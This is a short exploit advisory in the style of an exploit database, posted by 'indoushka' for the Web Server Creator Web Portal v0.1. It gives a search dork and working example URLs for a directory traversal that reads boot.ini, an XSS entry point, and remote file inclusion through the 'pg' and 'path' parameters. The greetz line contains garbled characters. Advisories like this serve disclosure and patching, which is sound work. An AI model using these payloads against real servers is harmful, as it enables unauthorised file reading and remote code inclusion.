======================================================================================== | # Title : Web Server Creator - Web Portal v 0.1 Multi Vulnerability | # Author : indoushka | # email : indoushka@hotmail.com | # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) | # Web Site : www.iq-ty.com | # Dork : All right reserved 2002-2003 (MSN/Web Server Creator) | # Tested on: windows SP2 Franais V.(Pnx2 2.0) + Lunix Franais v.(9.4 Ubuntu) | # Bug : Multi ====================== Exploit By indoushka ================================= # Exploit : 1- Directory traversal (Windows) http://127.0.0.1/1082_webserve-01/news/include/customize.php?l=../../../../../../../../boot.ini 2- XSS http://127.0.0.1:80/1082_webserve-01/index.php?pg=forum 3- RFI http://localhost/1082_webserve-01/index.php?pg=[EV!L] http://localhost/1082_webserve-01/news/form.php?path=[EV!L] ================================ Dz-Ghost Team ======================================== Greetz : Ï ÈÈ + ÈÑÏ + Ûæã Ï K10 + K@MEL + ã + ÊÛ -------------------------------------------------------------------------------------------